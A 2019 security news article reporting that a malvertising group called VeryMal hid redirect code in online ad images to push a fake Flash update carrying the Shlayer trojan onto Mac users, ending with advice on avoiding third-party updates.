Posted on January 25, 2019 at 4:21 PM
Apple Products Targeted by Malware Hiding in Online Images
While the number of online threats has been noticed to be on the rise multiple times in recent years, new reports claim that Apple product users are starting to experience them in larger quantities as well. A recent report published by a cybersecurity company Confidant claims so as well after the company’s researchers detected a new method of malware infection targeting Mac users.
According to the firm’s report, the campaign was conducted by a malvertising group known as VeryMal. The group is targeting Apple users specifically, which reminded many of another group reported last year, ScamClub.
The report also mentions that VeryMal uses steganography techniques which allow them to hide malicious codes inside images contained within online ads. While the main similarity between ScamClub and VeryMal lies in the fact that they are both targeting Apple product users, ScamClub had a much larger impact. This group managed to hijack 300 million web sessions among the iOS users in the US, while the ads infected by VeryMal were only viewed by 5 million users, although the actual number of those who had their devices infected is unknown.
The report also claims that the new campaign was only active for two days, from January 11th to January 13th.
How does the attack work?
Confidant’s report described the attack step by step, stating that it starts when a Mac user loads a legitimate website, which then loads an ad slot containing an image which hides a hidden malicious code. The ad slot itself then loads a JavaScript code, which checks if the device has proper fonts supported.
JavaScript then reads the image file, and in the process, it extracts the malicious code hidden inside. After detecting it, JS executes the code, which is actually a command that redirects the browser to a new URL. This method is used to bring the user to a page displaying a warning that the user’s Adobe Flash Player is not up to date, and that it needs to be updated. If the user gets tricked, their device downloads the Shlayer trojan, which immediately proceeds to infect the device.
The method is notable for being much stealthier and more sophisticated, which indicates that hackers’ techniques are evolving to match and outperform Mac security systems. As for the ad itself, it reportedly doesn’t harm the device in any way, apart from redirecting the browser to a page containing the trojan-infected file.
Researchers have also noted that VeryMal has attempted to perform similar attacks against Apple products in the past, although their methods were not as sophisticated as now.
Online threats to Mac evolving
Malwarebytes commented on the new method as well, confirming that the infected devices contain Shlayer, which is typically used for infiltrating the system and allowing other malicious software to be installed.
So far, researchers believe that VeryMal, just like ScamClub before it, only targets the US users in most of its campaigns. In addition, researchers believe that Steganography is growing in popularity as a technique, meaning that iOS users need to be careful during their online sessions. While Mac was always praised for having better defenses than other operating systems, it appears that bad actors are finding the way to damage its systems as well.
Because of this, users should never install software updates from third-party sources, or authenticate requests from the OS without knowing why they are necessary and what will they do.